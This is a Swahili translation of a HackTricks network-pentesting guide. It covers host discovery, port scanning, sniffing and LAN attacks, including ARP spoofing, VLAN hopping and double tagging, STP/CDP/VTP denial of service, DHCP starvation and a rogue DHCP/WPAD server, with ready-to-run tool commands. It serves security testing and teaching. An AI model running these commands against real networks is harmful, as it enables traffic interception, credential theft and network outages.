HackTricksPentesting Network
Reading time: 38 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Kugundua hosts kutoka nje
Hii itakuwa sehemu fupi kuhusu jinsi ya kupata IPs zinazojibu kutoka Internet.
Katika hali hii una baadhi ya scope of IPs (labda hata ranges kadhaa) na unataka tu kupata IPs gani zinazojibu.
ICMP
Hii ni njia rahisi zaidi na ya haraka ya kugundua kama host iko mtandaoni au la.
Unaweza kujaribu kutuma baadhi ya vifurushi vya ICMP na kutegemea majibu. Njia rahisi ni kutuma tu echo request na kutegemea majibu. Unaweza kufanya hivyo kwa kutumia ping au kwa kutumia fping kwa ranges.
Pia unaweza kutumia nmap kutuma aina nyingine za vifurushi vya ICMP (hii itaepusha vichujio kwa ICMP echo request-response).
ping -c 1 199.66.11.4 # 1 echo request to a host
fping -g 199.66.11.0/24 # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
TCP Port Discovery
Ni kawaida sana kuona kwamba aina zote za ICMP packets zinachujwa. Hivyo, yote unayoweza kufanya ili kukagua kama host iko up ni kujaribu kupata open ports. Kila host ina 65535 ports, kwa hivyo, ikiwa una "big" scope huwezi kujaribu kuangalia kama kila port ya kila host iko open au la, itachukua muda mwingi.
Hivyo, unachohitaji ni fast port scanner (masscan) na orodha ya ports zinazotumika zaidi:
#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24
Unaweza pia kufanya hatua hii kwa nmap, lakini ni polepole na kwa namna fulani nmap ina matatizo kutambua hosts up.
HTTP Port Discovery
Hii ni ugunduzi tu wa TCP port unaofaa unapotaka kuzingatia kugundua HTTP services:
masscan -p80,443,8000-8100,8443 199.66.11.0/24
Ugunduzi wa UDP port
Unaweza pia kujaribu kuangalia kama kuna UDP port open ili kuamua kama unapaswa kumwangalia kwa karibu kwa host. Kwa kuwa UDP services kawaida hazijibu kwa data yoyote kwa packet ya probe ya UDP tupu ya kawaida, ni vigumu kusema ikiwa port imechujwa au wazi. Njia rahisi ya kuamua hili ni kutuma packet inayohusiana na service inayokimbia, na kwa kuwa haujui ni service gani inaendesha, unapaswa kujaribu ile inayoweza kuwapo zaidi kulingana na nambari ya port:
nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable
Mstari wa nmap uliopendekezwa awali utajaribu top 1000 UDP ports katika kila host ndani ya anuwai ya /24, lakini hata hii peke yake itachukua >20min. Ikiwa unahitaji matokeo ya haraka zaidi unaweza kutumia udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24 Hii itatuma hizi UDP probes kwa bandari zao zilizotarajiwa (kwa anuwai ya /24 hii itachukua dakika 1 tu): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.
Ugundaji wa Bandari za SCTP
#Probably useless, but it's pretty fast, why not try it?
nmap -T4 -sY -n --open -Pn <IP/range>
Pentesting Wifi
Hapa unaweza kupata mwongozo mzuri wa Wifi attacks zote zinazojulikana wakati wa kuandika:
Discovering hosts from the inside
Ikiwa uko ndani ya network, moja ya mambo ya kwanza utakayopenda kufanya ni discover other hosts. Kulingana na kiasi cha noise unachoweza/utakayotaka kufanya, vitendo tofauti vinaweza kufanywa:
Passive
Unaweza kutumia tools hizi kugundua kwa passive hosts ndani ya network iliyounganishwa:
netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info
Hai
Kumbuka kwamba mbinu zilizooelezwa katika Discovering hosts from the outside (TCP/HTTP/UDP/SCTP Port Discovery) zinaweza pia kutumika hapa.\ But, kwa kuwa uko katika mtandao mmoja na hosts wengine, unaweza kufanya mambo zaidi:
#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)
#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain
# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)
#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.
ICMP Hai
Kumbuka kwamba mbinu zilizotajwa katika Kuvumbua hosts kutoka nje (ICMP) pia zinaweza kutumika hapa.
Lakini, kwa kuwa uko kwenye network ileile na hosts wengine, unaweza kufanya mambo zaidi:
- Ikiwa utapiga ping kwa subnet broadcast address, ping itafika kwa kila host na zinaweza kujibu kwako:
ping -b 10.10.5.255 - Kwa kupiga ping kwenye network broadcast address, unaweza hata kupata hosts ndani ya other subnets:
ping -b 255.255.255.255 - Tumia bendera za
nmap-PE,-PP,-PMkufanyika host discovery kwa kutuma mtiririko wa ICMPv4 echo, timestamp, na subnet mask requests:nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24
Wake On Lan
Wake On Lan inatumika kuwasha kompyuta kupitia network message. Paket ya 'magic' inayotumika kuwasha kompyuta ni packet ambayo MAC Dst imewekwa kisha inarudiwa mara 16 ndani ya packet hiyo.
Aina hizi za packet kawaida hutumwa kwenye ethernet 0x0842 au kwenye UDP packet to port 9.
Ikiwa hakuna [MAC] imetolewa, packet itatumwa kwa broadcast ethernet (na broadcast MAC ndilo litakalorudiwa).
# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0842
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9
Kuchunguza Hosts
Mara baada ya kugundua IPs zote (za nje au za ndani) unazotaka kuchunguza kwa kina, vitendo tofauti vinaweza kufanywa.
TCP
- Wazi port: SYN --> SYN/ACK --> RST
- Fungwa port: SYN --> RST/ACK
- Imechujwa port: SYN --> [NO RESPONSE]
- Imechujwa port: SYN --> ICMP message
# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>
#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000
UDP
- Tuma UDP packet na angalia majibu ICMP unreachable ikiwa port ni closed (kwa kesi kadhaa ICMP itakuwa filtered, hivyo hutapokea taarifa yoyote kuhusu ikiwa port ni closed au open).
- Tuma formatted datagrams ili kupata majibu kutoka kwa service (kwa mfano, DNS, DHCP, TFTP, na wengine, kama ilivyoorodheshwa katika nmap-payloads). Ikiwa utapokea response, basi port iko open.
Nmap itachanganya chaguzi zote mbili kwa kutumia "-sV" (UDP scans are very slow), lakini kumbuka kwamba UDP scans ni polepole zaidi kuliko TCP scans:
# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time
SCTP Scan
SCTP (Stream Control Transmission Protocol) imetengenezwa kutumika pamoja na TCP (Transmission Control Protocol) na UDP (User Datagram Protocol). Kusudi lake kuu ni kuwezesha usafirishaji wa data za telefonia kupitia mitandao ya IP, ikifanana na vipengele vingi vya uaminifu vinavyopatikana kwenye Signaling System 7 (SS7). SCTP ni sehemu ya msingi ya familia ya itifaki SIGTRAN, inayolenga kusafirisha ishara za SS7 kupitia mitandao ya IP.
Msaada kwa SCTP unatolewa na mifumo mbalimbali ya uendeshaji, kama IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, na VxWorks, ikionesha kukubalika kwake kwa upana na matumizi yake katika sekta ya mawasiliano na mitandao.
nmap inatoa scans mbili tofauti za SCTP: -sY na -sZ
# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>
Kuepuka IDS na IPS
Chaguzi zaidi za nmap
Kufichua Anwani za IP za Ndani
Misconfigured routers, firewalls, and network devices wakati mwingine hujibu network probes kwa kutumia nonpublic source addresses. tcpdump inaweza kutumika kubaini paketi zinazopokelewa kutoka kwa anwani za ndani wakati wa upimaji. Hasa, kwenye Kali Linux, paketi zinaweza kukamatwa kwenye eth2 interface, ambayo inapatikana kutoka kwenye Intaneti ya umma. Ni muhimu kutambua kwamba ikiwa mpangilio wako uko nyuma ya NAT au Firewall, paketi hizo zinaweza kuchujwa.
tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64
Sniffing
Kwa Sniffing unaweza kujifunza maelezo ya IP ranges, subnet sizes, MAC addresses, na hostnames kwa kupitia ukaguzi wa frames na packets zilizokamatwa. Ikiwa mtandao umewekwa vibaya au switching fabric iko chini ya mzigo, wadukuzi wanaweza kunasa taarifa nyeti kupitia passive network sniffing.
Ikiwa switched Ethernet network imewekwa ipasavyo, utaona tu broadcast frames na vitu vilivyolengwa kwa MAC address yako.
TCPDump
sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"
Pia, mtu anaweza kunasa packets kutoka kwa mashine ya mbali kupitia kikao cha SSH kwa kutumia Wireshark kama GUI kwa wakati halisi.
ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic
Bettercap
net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered
Wireshark
Bila shaka.
Capturing credentials
Unaweza kutumia zana kama https://github.com/lgandx/PCredz kuchambua credentials kutoka pcap au live interface.
Mashambulizi ya LAN
ARP spoofing
ARP Spoofing inajumuisha kutuma gratuitous ARPResponses ili kuonyesha kwamba IP ya mashine ina MAC ya kifaa chetu. Kisha, mwanaathiriwa atabadilisha jedwali la ARP na atawasiliana na mashine yetu kila anapotaka kuwasiliana na IP spoofed.
Bettercap
arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)
Arpspoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
MAC Flooding - CAM overflow
Jaza CAM table ya switch kwa kutuma packets nyingi zenye source mac address tofauti. Wakati CAM table imejaa, switch huanza kufanya kazi kama hub (broadcasting all the traffic).
macof -i <interface>
Katika switches za kisasa udhaifu huu umerekebishwa.
802.1Q VLAN / DTP Attacks
Dynamic Trunking
The Dynamic Trunking Protocol (DTP) imeundwa kama protocol ya link layer kusaidia mfumo wa kiotomatiki wa trunking, ikiruhusu switches kuchagua ports kwa ajili ya trunk mode (Trunk) au non-trunk mode kwa njia ya moja kwa moja. Utekelezaji wa DTP mara nyingi unaonekana kama dalili ya muundo duni wa mtandao, ikibainisha umuhimu wa kusanidi trunks kwa mikono tu pale inapohitajika na kuhakikisha nyaraka sahihi.
Kwa kawaida, switch ports zimewekwa kufanya kazi katika Dynamic Auto mode, yaani ziko tayari kuanzisha trunking ikiwa zitahimizwa na switch jirani. Hatari ya usalama inatokea pale pentester au attacker anapounganisha kwenye switch na kutuma DTP Desirable frame, na kulazimisha port kuingia trunk mode. Hatua hii inamruhusu attacker kuorodhesha VLANs kupitia uchambuzi wa STP frames na kuzunguka segmentation ya VLAN kwa kuanzisha virtual interfaces.
Uwepo wa DTP katika switches nyingi kwa default unaweza kutumiwa na maadui kuiga tabia ya switch, na hivyo kupata ufikiaji wa trafiki kupitia VLAN zote. Script dtpscan.sh hutumika kufuatilia interface, ikionyesha ikiwa switch iko katika Default, Trunk, Dynamic, Auto, au Access mode—hii ya mwisho ikiwa ndiyo configuration pekee iliyo kinga dhidi ya VLAN hopping attacks. Zana hii inatathmini hali ya udhaifu wa switch.
Ikiwa udhaifu wa mtandao utabainika, zana Yersinia inaweza kutumika "kuwasha trunking" kupitia protocol ya DTP, ikiruhusu kuangalia packets kutoka VLAN zote.
apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"
yersinia -G #For graphic mode
.png)
Ili kuorodhesha VLANs pia inawezekana kuunda fremu ya DTP Desirable kwa kutumia script DTPHijacking.py**. Usizuie script kwa hali yoyote. Inaingiza DTP Desirable kila sekunde tatu. Trunk channels zinazoundwa kwa dynamic kwenye switch huishi kwa dakika tano tu. Baada ya dakika tano, trunk inaanguka.
sudo python3 DTPHijacking.py --interface eth0
Ningependa kuonyesha kwamba Access/Desirable (0x03) inaonyesha kuwa fremu ya DTP ni ya aina Desirable, ambayo inaamuru port kubadilika kuwa Trunk mode. Na 802.1Q/802.1Q (0xa5) inaonyesha aina ya encapsulation 802.1Q.
Kwa kuchambua fremu za STP, tunagundua uwepo wa VLAN 30 na VLAN 60.
.png)
Attacking specific VLANs
Mara tu unapojua VLAN IDs na thamani za IPs, unaweza configure a virtual interface to attack a specific VLAN.
Ikiwa DHCP haipatikani, tumia ifconfig kuweka anwani ya IP ya statiki.
root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86 Bcast:10.121.5.255 Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB) TX bytes:1654 (1.6 KiB)
root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up
# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30
Otomatiki VLAN Hopper
Shambulio lililojadiliwa la Dynamic Trunking and creating virtual interfaces an discovering hosts inside katika VLAN nyingine hufanywa kwa otomatiki na zana: https://github.com/nccgroup/vlan-hopping---frogger
Double Tagging
Ikiwa mshambuliaji anajua thamani ya MAC, IP and VLAN ID of the victim host, anaweza kujaribu double tag a frame na VLAN iliyoteuliwa na VLAN ya muathirika kisha kutuma packet. Kwa kuwa muathirika hatoweza kuungana kurudi na mshambuliaji, hivyo chaguo bora kwa mshambuliaji ni kuwasiliana kupitia UDP na protocols ambazo zinaweza kufanya baadhi ya vitendo vya kuvutia (kama SNMP).
Another option for the attacker is to launch a TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.
.png)
Ili kutekeleza shambulio hili unaweza kutumia scapy: pip install scapy
from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)
Kupitisha Lateral VLAN Segmentation Bypass
Ikiwa una ufikiaji wa switch ambao umeunganishwa moja kwa moja, una uwezo wa kupitisha VLAN segmentation ndani ya mtandao. Badilisha tu port kuwa trunk mode (inayojulikana pia kama trunk), tengeneza virtual interfaces zenye IDs za target VLANs, na panga anwani ya IP. Unaweza kujaribu kuomba anwani kwa njia ya DHCP au kuiweka kimiliki (statically). Inategemea kesi.
Lateral VLAN Segmentation Bypass
Kupitisha Layer 3 Private VLAN Bypass
Katika mazingira fulani, kama vile guest wireless networks, port isolation (also known as private VLAN) hutumika ili kuzuia clients waliounganishwa kwenye wireless access point kuwasiliana moja kwa moja. Hata hivyo, mbinu imebainiwa inayoweza kuzunguka hatua hizi za isolation. Mbinu hii inatumia ukosefu wa network ACLs au usanidi usio sahihi, ikiruhusu vifurushi vya IP kupitishwa kupitia router ili kufika kwa client mwingine kwenye mtandao huo huo.
Shambulio linatekelezwa kwa kutengeneza paketi inayobeba anwani ya IP ya client lengwa lakini ikiwa na router's MAC address. Hii husababisha router kuipatia paketi hiyo kimakosa kwa client lengwa. Njia hii ni sawa na ile inayotumiwa katika Double Tagging Attacks, ambapo uwezo wa kudhibiti host inayoweza kufikiwa na mwathiriwa unatumiwa kuutilia dozi hitilafu ya usalama.
Key Steps of the Attack:
- Crafting a Packet: Paketi inatengenezwa maalum ili ijaze IP address ya client lengwa lakini ikiwa na router's MAC address.
- Exploiting Router Behavior: Paketi hiyo iliyotengenezwa inatumwa hadi router, ambayo kwa sababu ya usanidi, inarejesha paketi kwa client lengwa, ikipita isolation iliyotolewa na private VLAN settings.
VTP Attacks
VTP (VLAN Trunking Protocol) inalenga kuendesha uendeshaji wa VLAN kwa kit centralized. Inatumia revision numbers kudumisha uadilifu wa VLAN database; mabadiliko yoyote huongeza nambari hii. Switches hupokea configurations zenye revision numbers za juu zaidi, na kusasisha VLAN database zao.
VTP Domain Roles
- VTP Server: Inasimamia VLAN—huunda, hufuta, hubadilisha. Inatuma VTP announcements kwa wanachama wa domain.
- VTP Client: Inapokea VTP announcements ili kusawazisha VLAN database yake. Wajukuu wake banwa kutoka kufanya mabadiliko ya VLAN vizuri.
- VTP Transparent: Haitumii VTP updates lakini inapitisha VTP announcements. Haathiriwi na VTP attacks, na ina revision number ya daima zero.
VTP Advertisement Types
- Summary Advertisement: Inatolewa na VTP server kila sekunde 300, ikibeba taarifa muhimu za domain.
- Subset Advertisement: Inatumwa baada ya mabadiliko ya VLAN configuration.
- Advertisement Request: Inotolewa na VTP client kuomba Summary Advertisement, kawaida kama majibu ya kugundua configuration revision number ya juu zaidi.
VTP vulnerabilities zinaweza kutumika tu kupitia trunk ports kwani VTP announcements zinazunguka kupitia port hizo pekee. Baada ya shambulio la DTP huenda shambulio likageuka kuwa VTP. Zana kama Yersinia zinaweza kusaidia katika VTP attacks, lengo likiwa kufuta VLAN database, ikiharibu mtandao kwa ufanisi.
Note: Mjadala huu unahusu VTP version 1 (VTPv1).
yersinia -G # Launch Yersinia in graphical mode
Katika graphical mode ya Yersinia, chagua chaguo la deleting all VTP vlans ili kufuta VLAN database.
STP Attacks
Ikiwa huwezi kukamata BPDU frames kwenye interfaces zako, ni vigumu utafanikiwe katika STP attack.
STP BPDU DoS
Kutuma BPDUs nyingi za TCP (Topology Change Notification) au Conf (BPDUs zinazotumwa wakati topology inaundwa) husababisha switches kuzidiwa na kuacha kufanya kazi vizuri.
yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing
STP TCP Attack
Wakati TCP inapotumwa, jedwali la CAM la switches litafutwa ndani ya 15s. Kisha, ikiwa unatumia kwa kuendelea aina hizi za packets, jedwali la CAM litaanzishwa upya mara kwa mara (au kila 15s) na inapofufuliwa, switch itatenda kama hub
yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen
STP Root Attack
Mshambuliaji anajifanya kama switch ili kuwa STP root wa mtandao. Kisha, data zaidi itapitia kupitia kwake. Hili ni muhimu ukiwa umeunganishwa kwa switch mbili tofauti.
Hii hufanywa kwa kutuma BPDUs CONF packets zikidai kwamba thamani ya priority ni ndogo kuliko ile ya root switch halisi.
yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root
Ikiwa mshambulizi ameunganishwa kwenye switches 2 anaweza kuwa mzizi wa mti mpya na trafiki yote kati ya switches hizo itapitia kupitia kwake (a MITM attack will be performed).
yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages
Mashambulio ya CDP
CISCO Discovery Protocol (CDP) ni muhimu kwa mawasiliano kati ya vifaa vya CISCO, ikiwaruhusu kujitanisha na kushiriki maelezo ya usanidi.
Ukusanyaji wa Data (Passive)
CDP imewekwa ili kurusha taarifa kupitia bandari zote, ambayo inaweza kusababisha hatari ya usalama. Mdukuzi, akiwa ameunganishwa kwenye porti ya switch, anaweza kutumia network sniffers kama Wireshark, tcpdump, au Yersinia. Hatua hii inaweza kufichua data nyeti kuhusu kifaa cha mtandao, ikijumuisha mfano wake na toleo la Cisco IOS linaloendesha. Mdukuzi anaweza kisha kulenga udhaifu maalum kwenye toleo hilo la Cisco IOS.
Kusababisha Kujaa kwa Jedwali la CDP
Mbinu kali zaidi inahusisha kuzindua shambulio la Denial of Service (DoS) kwa kumwaga kumbukumbu ya switch, akijifanya kuwa vifaa halali vya CISCO. Hapa chini ni mfululizo wa amri za kuanzisha shambulio kama hilo kwa kutumia Yersinia, zana ya mtandao iliyoundwa kwa ajili ya kujaribu:
sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G
Wakati wa shambulio hili, CPU ya switch na jedwali la majirani la CDP vinabebwa mzigo mkubwa, na kusababisha kile kinachoitwa mara nyingi “paralisi ya mtandao” kutokana na matumizi ya rasilimali kupita kiasi.
CDP Impersonation Attack
sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet
Unaweza pia kutumia scapy. Hakikisha kuisakinisha na kifurushi scapy/contrib.
Shambulio za VoIP na Zana VoIP Hopper
Simu za VoIP, zinazounganishwa zaidi na vifaa vya IoT, zinatoa huduma kama kufungua milango au kudhibiti thermostats kupitia nambari maalum za simu. Hata hivyo, uunganisho huu unaweza kuleta hatari za usalama.
The tool voiphopper imeundwa kuiga simu ya VoIP katika mazingira mbalimbali (Cisco, Avaya, Nortel, Alcatel-Lucent). Inagundua VLAN ID ya mtandao wa sauti kwa kutumia itifaki kama CDP, DHCP, LLDP-MED, na 802.1Q ARP.
VoIP Hopper inatoa hali tatu kwa Cisco Discovery Protocol (CDP):
- Sniff Mode (
-c 0): Inachambua vifurushi vya mtandao ili kubaini VLAN ID. - Spoof Mode (
-c 1): Inatengeneza vifurushi maalum vinavyofanana na vya kifaa halisi cha VoIP. - Spoof with Pre-made Packet Mode (
-c 2): Inatuma vifurushi vinavyolingana kabisa na vya modeli maalum ya Cisco IP phone.
Hali inayopendekezwa kwa kasi ni ya tatu. Inahitaji kutaja:
- interface ya mtandao ya mshambuliaji (
-iparameter). - jina la kifaa cha VoIP kinachoigwa (
-Eparameter), ukizingatia muundo wa majina wa Cisco (mfano, SEP ikifuatiwa na anwani ya MAC).
Katika mazingira ya kampuni, ili kuiga kifaa kilicho tayari kuwepo cha VoIP, mtu anaweza:
- Kukagua lebo ya MAC kwenye simu.
- Kupitia mipangilio ya skrini ya simu kuona taarifa za modeli.
- Kuunganisha kifaa cha VoIP kwa laptop na kuangalia maombi ya CDP kwa kutumia Wireshark.
Mfano wa amri ya kutekeleza zana katika hali ya tatu ungekuwa:
voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2
DHCP Attacks
Enumeration
nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
| Response 1 of 1:
| IP Offered: 192.168.1.250
| DHCP Message Type: DHCPOFFER
| Server Identifier: 192.168.1.1
| IP Address Lease Time: 1m00s
| Subnet Mask: 255.255.255.0
| Router: 192.168.1.1
| Domain Name Server: 192.168.1.1
|_ Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds
DoS
Aina mbili za DoS zinaweza kufanywa dhidi ya DHCP servers. Ya kwanza inahusisha simulate enough fake hosts to use all the possible IP addresses.
Shambulio hili litafanya kazi tu ikiwa unaweza kuona majibu ya DHCP server na kukamilisha protocol (Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)). Kwa mfano, hili siwezekani kwenye mitandao ya Wifi.
Njia nyingine ya kutekeleza DHCP DoS ni kutuma a DHCP-RELEASE packet using as source code every possible IP. Kisha, server itafikiri kwamba kila mtu ameisha kutumia IP.
yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed
Njia ya kiotomatiki zaidi ya kufanya hili ni kutumia zana DHCPing
Unaweza kutumia mashambulio ya DoS yaliyotajwa kulazimisha wateja wapate leases mpya ndani ya mazingira, na kuchosha servers halali hadi zisijibu. Hivyo, wakati wale halali wanapojaribu kuunganishwa tena, unaweza kuwapa thamani zenye madhara zilizotajwa katika shambulio lijalo.
Weka thamani hatari
Server ya DHCP ya udanganyifu inaweza kuanzishwa kwa kutumia script ya DHCP iliyopo kwenye /usr/share/responder/DHCP.py. Hii ni muhimu kwa mashambulio ya mtandao, kama kukamata trafiki ya HTTP na vitambulisho, kwa kupitisha trafiki kwa server ya udanganyifu. Hata hivyo, kuweka gateway ya udanganyifu ni chache ufanisi kwa sababu inaruhusu tu kukamata trafiki inayotoka kwa mteja, ikikosa majibu kutoka kwa gateway halisi. Badala yake, tunapendekeza kuanzisha server ya DNS au WPAD ya udanganyifu kwa shambulio lililo na ufanisi zaidi.
Hapo chini ni chaguzi za amri za kusanidi server ya DHCP ya udanganyifu:
- Anwani yetu ya IP (Gateway Advertisement): Tumia
-i 10.0.0.100kutangaza IP ya mashine yako kama gateway. - Local DNS Domain Name: Ki hiari, tumia
-d example.orgkuweka jina la domaini ya DNS ya ndani. - Original Router/Gateway IP: Tumia
-r 10.0.0.1kubainisha anwani ya IP ya router/gateway halali. - Primary DNS Server IP: Tumia
-p 10.0.0.100kuweka anwani ya IP ya server ya DNS ya udanganyifu unayodhibiti. - Secondary DNS Server IP: Ki hiari, tumia
-s 10.0.0.1kuweka IP ya server ya pili ya DNS. - Netmask of Local Network: Tumia
-n 255.255.255.0kubainisha netmask ya mtandao wa ndani. - Interface for DHCP Traffic: Tumia
-I eth1kusikiliza trafiki ya DHCP kwenye interface maalum ya mtandao. - WPAD Configuration Address: Tumia
-w “http://10.0.0.100/wpad.dat”kuweka anwani ya konfigurasi ya WPAD, kusaidia katika kukamata trafiki ya wavuti. - Udanganyifu wa IP ya Gateway chaguo-msingi: Ongeza
-Skudanganya anwani ya IP ya gateway chaguo-msingi. - Jibu Maombi yote ya DHCP: Ongeza
-Rili kufanya server kujibu maombi yote ya DHCP, lakini fahamu kuwa hii ni ya kelele na inaweza kugunduliwa.
Kwa kutumia chaguzi hizi kwa usahihi, server ya DHCP ya udanganyifu inaweza kuanzishwa ili kukamata trafiki ya mtandao kwa ufanisi.
# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R
EAP Mashambulizi
Hapa kuna baadhi ya mbinu za shambulizi ambazo zinaweza kutumika dhidi ya utekekelezaji wa 802.1X:
- Brute-force ya password kwa njia ya EAP (active)
- Kushambulia server ya RADIUS kwa content ya EAP isiyofaa **(exploits)
- Kukamata ujumbe wa EAP na kukata password offline (EAP-MD5 na PEAP)
